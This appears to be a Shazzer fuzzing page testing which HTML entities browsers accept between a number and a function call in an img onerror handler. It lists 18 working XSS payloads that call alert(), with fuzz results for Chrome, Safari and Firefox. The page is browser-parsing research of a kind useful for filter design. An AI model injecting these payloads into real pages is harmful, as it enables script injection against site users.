Entities allowed between function call and number
18
18
18
This vector uses Shazzer's new features to check which entities are allowed between a function call and number using images. The results are a bit inconsistent yet because I currently wait for page load.
Created by: hackvertor
Created on: Tuesday, July 2, 2024 at 11:29:20 AM
Updated on: Wednesday, December 11, 2024 at 8:38:38 PM
Vector type: XSS
Vector charset: UTF-8
Template used:
<img src=data: onerror="1$[data1]log('html($[data1])')">
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...
Sample payloads
<img src=data: onerror="1|alert('&VerticalLine;')">
<img src=data: onerror="1;alert('&semi;')">
<img src=data: onerror="1*alert('&midast;')">
<img src=data: onerror="1&alert('&amp;')">
<img src=data: onerror="1
alert('&NewLine;')">
<img src=data: onerror="1+alert('&plus;')">
<img src=data: onerror="1<alert('&LT;')">
<img src=data: onerror="1/alert('&sol;')">
<img src=data: onerror="1*alert('&ast;')">
<img src=data: onerror="1^alert('&Hat;')">
<img src=data: onerror="1<alert('&lt;')">
<img src=data: onerror="1|alert('&verbar;')">
<img src=data: onerror="1,alert('&comma;')">
<img src=data: onerror="1>alert('&gt;')">
<img src=data: onerror="1|alert('&vert;')">
<img src=data: onerror="1>alert('&GT;')">
<img src=data: onerror="1&alert('&AMP;')">
<img src=data: onerror="1%alert('&percnt;')">
Fuzz results
Chrome 126.0.0.0 desktop macOS 10.15.7
Updated
Tue Jul 02 2024
Found 18 results
Loading...
Safari 18.0 desktop macOS 10.15.7
Updated
Tue Jul 02 2024
Found 18 results
Loading...
Firefox 127.0 desktop macOS 10.15
Updated
Tue Jul 02 2024
Found 18 results
Loading...